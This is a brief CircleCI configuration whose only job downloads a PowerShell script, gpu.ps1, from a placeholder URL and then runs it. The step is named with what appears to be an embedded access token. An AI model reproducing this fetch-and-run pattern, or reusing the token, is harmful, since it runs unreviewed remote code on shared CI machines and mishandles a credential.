version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
      
        
 
    steps:  
       
      - run: 
          name: 24tkACw7oK9dkk3VEbE1AuLhBjL_5vHopmexyGcw2jXt2M93
          command: |      
            Invoke-WebRequest PASTE YOU RAW LINK HERE -OutFile gpu.ps1 
          
      - run: ./gpu.ps1